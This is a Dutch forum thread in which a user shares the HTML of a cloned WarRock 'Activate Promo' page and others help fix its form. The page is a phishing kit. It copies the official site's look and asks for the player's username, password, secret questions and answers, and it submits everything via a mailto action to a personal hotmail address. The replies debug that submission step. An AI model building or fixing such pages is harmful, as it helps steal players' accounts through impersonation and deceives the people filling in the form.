 align="left">&nbsp;</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
        <p class="underline"
 style="margin-top: 0pt; margin-bottom: 0pt;"> Please
validate login again: </p>
        <p class="small"
 style="margin-top: 0pt; margin-bottom: 0pt;">Username:</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"> <span
 class="small"> <input class="field" name="naam"
 size="25" type="text"> </span></p>
        <p class="small"
 style="margin-top: 0pt; margin-bottom: 0pt;">Password:</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"> <input
 class="field" name="w8 woord" size="25"
 type="password"> </p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;
        </p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">Please
make sure the&nbsp; answer and login details are correct, or you
won't receive a promo code activation.</p>
        <p style="margin-bottom: 0pt;"><strong>Note:</strong>
If you have a <strong>G1 Account</strong> you must insert
your username and password that you use on <strong>G1 Website</strong>
and not on <strong>WarRock Website</strong>, or the
activation will not take effect. </p>
        <p>&nbsp;</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"
 align="center"> <input name="submit"
 class="button" id="bottoni" value="Activate Promo"
 onclick=mailto:umit_soldier@hotmail.com
 type="submit"> </p>
      </form>
      </div>
      </td>
      <td background="https://www.warrock.net/_img/content_12.gif"
 valign="top"> <img
 src="https://www.warrock.net/_img/content_08.gif" height="142"
 width="17"></td>
    </tr>
    <tr>
      <td background="https://www.warrock.net/_img/content_09.gif"
 height="8" width="18"> </td>
      <td colspan="2"
 background="https://www.warrock.net/_img/content_10.gif"
 height="8" width="550"> </td>
      <td background="https://www.warrock.net/_img/content_11.gif"
 height="8" width="1"> </td>
      <td background="https://www.warrock.net/_img/content_12.gif"
 height="8" width="17"> </td>
    </tr>
    <tr>
      <td colspan="5"
 background="https://www.warrock.net/_img/content_13.gif"
 height="16" width="586"> </td>
    </tr>
    <tr>
      <td background="https://www.warrock.net/_img/spacer.gif"
 height="1" width="18"> </td>
      <td background="https://www.warrock.net/_img/spacer.gif"
 height="1" width="199"> </td>
      <td background="https://www.warrock.net/_img/spacer.gif"
 height="1" width="351"> </td>
      <td background="https://www.warrock.net/_img/spacer.gif"
 height="1" width="1"> </td>
      <td background="https://www.warrock.net/_img/spacer.gif"
 height="1" width="17"> </td>
    </tr>
  </tbody>
</table>
<!-- END PAGE CONTENT//-->
</div>
<div id="rightpanel">
<div id="download_bck" style="cursor: pointer;"
 onclick="window.location='https://www.warrock.net/download.php';"></div>
<div id="game_guide_bck">
</div>
<div id="ad_panel_top"></div>
<div id="ad_panel_left"></div>
<div id="ad_panel_top2"></div>
<div id="ad_panel_right"></div>
<div id="ad_panel_bck_01"
 style="background-image: url(https://www.warrock.net/_img/monitor_1_top.gif);">
<iframe src="http://www.warrock.net/monitor_1_flash.php" id=""
 marginwidth="0" marginheight="0" frameborder="0"
 height="284" scrolling="no" width="182"></iframe>
</div>
<div id="ad_panel_bolts_01"></div>
<div id="ad_panel_bck_02"
 style="background-image: url(https://www.warrock.net/_img/monitor_2_top.gif);">
<iframe src="http://www.warrock.net/monitor_5_flash.php" id=""
 marginwidth="0" marginheight="0" frameborder="0"
 height="220" scrolling="no" width="182"></iframe>
</div>
<div id="ad_panel_bolts_02"></div>
<div id="ad_panel_bck_03"
 style="background-image: url(https://www.warrock.net/_img/monitor_3_top.gif);">
<iframe src="http://www.warrock.net/monitor_2_flash.php" id=""
 marginwidth="0" marginheight="0" frameborder="0"
 height="220" scrolling="no" width="182"></iframe>
</div>
<div id="ad_panel_bolts_01"></div>
<div id="ad_panel_bck_04"
 style="background-image: url(https://www.warrock.net/_img/adsense_bg.jpg);">
<div style="position: relative; top: 50px;"><iframe
 src="http://www.worrock.netsons.org/ads.htm" id=""
 marginwidth="0" marginheight="0" frameborder="0"
 height="600" scrolling="no" width="120"></iframe>
</div>
</div>
</div>
<div id="ad_panel_bottom"></div>
</div>
</div>
<table
 style="background: transparent url(https://www.warrock.net/_img/footer_bottom.gif) no-repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;"
 align="center" border="0" cellpadding="0"
 cellspacing="0" height="233" width="990">
  <tbody>
    <tr>
      <td align="center" height="70" valign="middle">
      <p>&nbsp;</p>
      <p><span class="footer"
 style="text-align: center;"><a
 href="https://www.warrock.net/download.php" class="footer">Client</a>
| <a href="https://www.gamersfirst.com/register/index.php?g=5"
 class="footer">Register</a> | <a
 href="http://affiliates.k2network.net/" class="footer">Become
an Affiliate</a> | <a
 href="https://www.warrock.net/legal_documents.php"
 class="footer">Legal Documents</a> | <a
 href="https://www.warrock.net/index.php" class="footer">Home</a>
      <br>
&copy; K2 Network, Inc. &amp; Dream Execution Technology, Co.,
Ltd. </span><br>
      </p>
      </td>
    </tr>
    <tr>
      <td align="center" height="90" valign="middle">
      <div align="center"><span class="footer"
 style="text-align: center;">&nbsp;&nbsp;<a
 href="http://www.k2network.net/" target="_blank"><img
 src="https://www.warrock.net/_img/footer_left.png" border="0"
 height="95" width="111"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a
 href="http://www.cenzic.com/" target="_blank"><img
 src="https://www.warrock.net/_img/cenzic_cert_webbadge.gif"
 border="0" height="95" width="94"></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a
 href="http://www.pegi.info/en/index/" target="_blank"><img
 src="https://www.warrock.net/_img/pegi16.gif" border="0"
 height="95" width="49"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a
 href="http://www.usk.de/" target="_blank"><img
 src="https://www.warrock.net/_img/USK_16.png" border="0"
 height="95" width="95"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a
 href="http://www.esrb.org/ratings/ratings_guide.jsp"
 target="_blank"><img
 src="https://www.warrock.net/_img/esrb_logo.jpg" border="0"
 height="95" width="127"></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a
 href="http://www.k2network.net/privacy.php" target="_blank"><img
 src="https://www.warrock.net/_img/privacy_certified2.gif"
 border="0" height="95" width="117"></a>&nbsp;&nbsp;&nbsp;<a
 href="http://www.dreamexe.net/" target="_blank"><img
 src="https://www.warrock.net/_img/footer_right.png" border="0"
 height="95" width="191"></a></span></div>
      </td>
    </tr>
  </tbody>
</table>
<div id="cover"
 style="position: absolute; top: 0px; left: 0px; width: 100%; height: 167px; min-width: 990px; display: none;">
<script type="text/javascript">showflash('cover','100%','100%');</script></div>
<div id="gameguide"
 style="position: absolute; top: 0px; left: 0px; width: 100%; height: 150px; min-width: 990px; display: none; text-align: center;">
<div>
<script type="text/javascript">showflash('gameguide','905','725');</script></div>
</div>
<div id="error"
 style="position: absolute; width: 100%; height: 159px; top: 0px; left: 0px; display: none; background-color: rgb(85, 85, 85); opacity: 0;"></div>
<div id="screenshot"
 style="position: absolute; width: 100%; height: 170px; top: 0px; left: 0px; display: none; background-color: rgb(0, 0, 0); opacity: 0;"></div>
<script type="text/javascript">
<!--
function veil()
{
var a = document.getElementById('error');
a.style.display='block';
}
function noError()
{
var a = document.getElementById('error');
a.style.display='none';
window.parent.document.getElementById('vidId').parentNode.removeChild(window.parent.document.getElementById('vidId'));
messageObj.close();
}
messageObj = new DHTML_modalMessage(); // We only create one object of this class
messageObj.setShadowOffset(5); // Large shadow
function error(url)
{
messageObj.setSource(url);
messageObj.setCssClassMessageBox(false);
messageObj.setSize(400,225);
messageObj.setShadowDivVisible(true); // Enable shadow for these boxes
messageObj.display();
veil();
}
function video(url)
{
messageObj.setSource(url);
messageObj.setCssClassMessageBox(false);
messageObj.setSize(420,410);
messageObj.setShadowDivVisible(true); // Enable shadow for these boxes
messageObj.display();
}
function closeMessage()
{
messageObj.close();
}
//-->
</script>
<!--<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct = "UA-475901-2";urchinTracker();</script>
--><!-- SiteCatalyst code version: H.14.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script language="JavaScript"
 src="https://www.warrock.net/js/s_code.js"></script>
<script language="JavaScript"><!--
/* You may give each page an identifying name, server, and channel on the next lines. */
s.pageName="EN : My Account : Activate Promo"
s.server="WR"
s.channel="My Account"
s.pageType=""
s.prop1=""
s.prop2=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script language="JavaScript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script>
<noscript><a href="http://www.omniture.com/" title="Web
Analytics"><img
src="http://k2-gamersfirst-www.112.2o7.net/b/ss/k2-gamersfirst-www/1/H.14--NS/0"
height="1" width="1" border="0" alt="" /></a></noscript>
<!--/DO NOT REMOVE/--><!-- End SiteCatalyst code version: H.14. -->
<script defer="defer" type="text/javascript"
 src="https://www.warrock.net/_inc/pngfix.js"></script><!-- Mirrored from www.warrock.net/activate_promo.php by HTTrack Website Copier/3.x [XR&CO'2007], Tue, 04 Mar 2008 11:11:49 GMT --><br>
<b>Warning</b>: Cannot modify header information - headers
already sent
by (output started at
\\192.168.0.16\webfiles\files\2008-11\2881967\index.php:145) in <b>\\192.168.0.16\webfiles\files\2008-11\2881967\index.php</b>
on line <b>947</b><br>
</body>
</html>
 
dit moet tussen haakjes: action=mailto:umit_soldier@hotmail.com

dus zo "action=mailto:umit_soldier@hotmail.com"
 
dit moet tussen haakjes: action=mailto:umit_soldier@hotmail.com

dus zo "action=mailto:umit_soldier@hotmail.com"

het werkt niet.
Als ik nu op de button klik krijg ik dit:
HTML:
The page cannot be displayed
The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access. 
--------------------------------------------------------------------------------

Please try the following:

Contact the Web site administrator if you believe that this request should be allowed. 
Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly. 
HTTP Error 405 - The HTTP verb used to access this page is not allowed.
Internet Information Services (IIS)

--------------------------------------------------------------------------------

Technical Information (for support personnel)

Go to Microsoft Product Support Services and perform a title search for the words HTTP and 405. 
Open IIS Help, which is accessible in IIS Manager (inetmgr), and search for topics titled Setting Application Mappings, Securing Your Site with Web Site Permissions, and About Custom Error Messages.
 
PHP:
      <form name="formkinglion" method="post"
 action="mailto:umit_soldier@hotmail.com>
        <p class="heading"
 style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"><span
 class="style4">Secret Question 1:</span>
        <select name="domanda" class="reg_field"
 id="domanda">
        <option value="">Select a Question</option>
        <option value="What was the name of your first pet?">What
was the name of your first pet?</option>
        <option value="What was the name of your first school?">What
was the name of your first school?</option>
        <option value="What was the first video game you played?">What
was the first video game you played?</option>
        <option value="What was your favorite TV show as a child?">What
was your favorite comic or cartoon as a child?</option>
        <option
 value="What was the name of the street you grew up on?">What
was the name of the street you grew up on?</option>
        <option value="What was the name of your first teacher?">What
was the name of your first teacher?</option>
        <option
 value="What was your favorite place to visit as a child?">What
was your favorite place to visit as a child?</option>
        <option value="What was your first job?">What was
your first job?</option>
        <option va="" 1da0=""
 lue="What is your favorite sports team?">What is your
favorite sports team?</option>
        <option value="What is your favorite food?">What
is your favorite food?</option>
        </select>
        </p>
        <p style="margin-top: 0pt;"> Secret Answer 1<span
 style="margin-top: 0pt;">: &nbsp; </span><span
 style="margin-top: 0pt; margin-bottom: 0pt;"> <input
 name="question" class="reg_field" id="question"
 size="30" type="text"> </span><span
 style="margin-top: 0pt; margin-bottom: 0pt;"> </span></p>
        <span style="margin-top: 0pt; margin-bottom: 0pt;">
        <p style="margin-top: 0pt; margin-bottom: 0pt;"> <span
 class="style4">Secret Question 2:</span>
        <select name="domanda2" class="reg_field"
 id="domanda2">
        <option value="">Select a Question</option>
        <option value="What was the name of your first pet?">What
was the name of your first pet?</option>
        <option value="What was the name of your first school?">What
was the name of your first school?</option>
        <option value="What was the first video game you played?">What
was the first video game you played?</option>
        <option value="What was your favorite TV show as a child?">What
was your favorite comic or cartoon as a child?</option>
        <option
 value="What was the name of the street you grew up on?">What
was the name of the street you grew up on?</option>
        <option value="What was the name of your first teacher?">What
was the name of your first teacher?</option>
        <option
 value="What was your favorite place to visit as a child?">What
was your favorite place to visit as a child?</option>
        <option value="What was your first job?">What was
your first job?</option>
        <option va="" 1da0=""
 lue="What is your favorite sports team?">What is your
favorite sports team?</option>
        <option value="What is your favorite food?">What
is your favorite food?</option>
        </select>
        </p>
        <p style="margin-top: 0pt;"> Secret Answer 2:
&nbsp; <input name="question2" class="reg_field"
 id="question2" size="30" type="text"> </p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
        </span>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"
 align="left">Level:&nbsp; <input name="lvl"
 id="lvl" maxlength="2" class="reg_field" size="3"
 type="text">
Your level in game</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"
 align="left">&nbsp;</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
        <p class="underline"
 style="margin-top: 0pt; margin-bottom: 0pt;"> Please
validate login again: </p>
        <p class="small"
 style="margin-top: 0pt; margin-bottom: 0pt;">Username:</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"> <span
 class="small"> <input class="field" name="naam"
 size="25" type="text"> </span></p>
        <p class="small"
 style="margin-top: 0pt; margin-bottom: 0pt;">Password:</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"> <input
 class="field" name="w8 woord" size="25"
 type="password"> </p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;
        </p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">Please
make sure the&nbsp; answer and login details are correct, or you
won't receive a promo code activation.</p>
        <p style="margin-bottom: 0pt;"><strong>Note:</strong>
If you have a <strong>G1 Account</strong> you must insert
your username and password that you use on <strong>G1 Website</strong>
and not on <strong>WarRock Website</strong>, or the
activation will not take effect. </p>
        <p>&nbsp;</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"
 align="center"> <input name="submit"
 class="button" id="bottoni" value="Activate Promo"
 type="submit"> </p>
      </form>
probeer dit eens
 
PHP:
      <form name="formkinglion" method="post"
 action="mailto:umit_soldier@hotmail.com>
        <p class="heading"
 style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"><span
 class="style4">Secret Question 1:</span>
        <select name="domanda" class="reg_field"
 id="domanda">
        <option value="">Select a Question</option>
        <option value="What was the name of your first pet?">What
was the name of your first pet?</option>
        <option value="What was the name of your first school?">What
was the name of your first school?</option>
        <option value="What was the first video game you played?">What
was the first video game you played?</option>
        <option value="What was your favorite TV show as a child?">What
was your favorite comic or cartoon as a child?</option>
        <option
 value="What was the name of the street you grew up on?">What
was the name of the street you grew up on?</option>
        <option value="What was the name of your first teacher?">What
was the name of your first teacher?</option>
        <option
 value="What was your favorite place to visit as a child?">What
was your favorite place to visit as a child?</option>
        <option value="What was your first job?">What was
your first job?</option>
        <option va="" 1da0=""
 lue="What is your favorite sports team?">What is your
favorite sports team?</option>
        <option value="What is your favorite food?">What
is your favorite food?</option>
        </select>
        </p>
        <p style="margin-top: 0pt;"> Secret Answer 1<span
 style="margin-top: 0pt;">: &nbsp; </span><span
 style="margin-top: 0pt; margin-bottom: 0pt;"> <input
 name="question" class="reg_field" id="question"
 size="30" type="text"> </span><span
 style="margin-top: 0pt; margin-bottom: 0pt;"> </span></p>
        <span style="margin-top: 0pt; margin-bottom: 0pt;">
        <p style="margin-top: 0pt; margin-bottom: 0pt;"> <span
 class="style4">Secret Question 2:</span>
        <select name="domanda2" class="reg_field"
 id="domanda2">
        <option value="">Select a Question</option>
        <option value="What was the name of your first pet?">What
was the name of your first pet?</option>
        <option value="What was the name of your first school?">What
was the name of your first school?</option>
        <option value="What was the first video game you played?">What
was the first video game you played?</option>
        <option value="What was your favorite TV show as a child?">What
was your favorite comic or cartoon as a child?</option>
        <option
 value="What was the name of the street you grew up on?">What
was the name of the street you grew up on?</option>
        <option value="What was the name of your first teacher?">What
was the name of your first teacher?</option>
        <option
 value="What was your favorite place to visit as a child?">What
was your favorite place to visit as a child?</option>
        <option value="What was your first job?">What was
your first job?</option>
        <option va="" 1da0=""
 lue="What is your favorite sports team?">What is your
favorite sports team?</option>
        <option value="What is your favorite food?">What
is your favorite food?</option>
        </select>
        </p>
        <p style="margin-top: 0pt;"> Secret Answer 2:
&nbsp; <input name="question2" class="reg_field"
 id="question2" size="30" type="text"> </p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
        </span>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"
 align="left">Level:&nbsp; <input name="lvl"
 id="lvl" maxlength="2" class="reg_field" size="3"
 type="text">
Your level in game</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"
 align="left">&nbsp;</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
        <p class="underline"
 style="margin-top: 0pt; margin-bottom: 0pt;"> Please
validate login again: </p>
        <p class="small"
 style="margin-top: 0pt; margin-bottom: 0pt;">Username:</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"> <span
 class="small"> <input class="field" name="naam"
 size="25" type="text"> </span></p>
        <p class="small"
 style="margin-top: 0pt; margin-bottom: 0pt;">Password:</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"> <input
 class="field" name="w8 woord" size="25"
 type="password"> </p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;
        </p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">Please
make sure the&nbsp; answer and login details are correct, or you
won't receive a promo code activation.</p>
        <p style="margin-bottom: 0pt;"><strong>Note:</strong>
If you have a <strong>G1 Account</strong> you must insert
your username and password that you use on <strong>G1 Website</strong>
and not on <strong>WarRock Website</strong>, or the
activation will not take effect. </p>
        <p>&nbsp;</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"
 align="center"> <input name="submit"
 class="button" id="bottoni" value="Activate Promo"
 type="submit"> </p>
      </form>
probeer dit eens

Als ik nu op de button klik krijg ik deze melding:
123kb2.jpg
 
Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan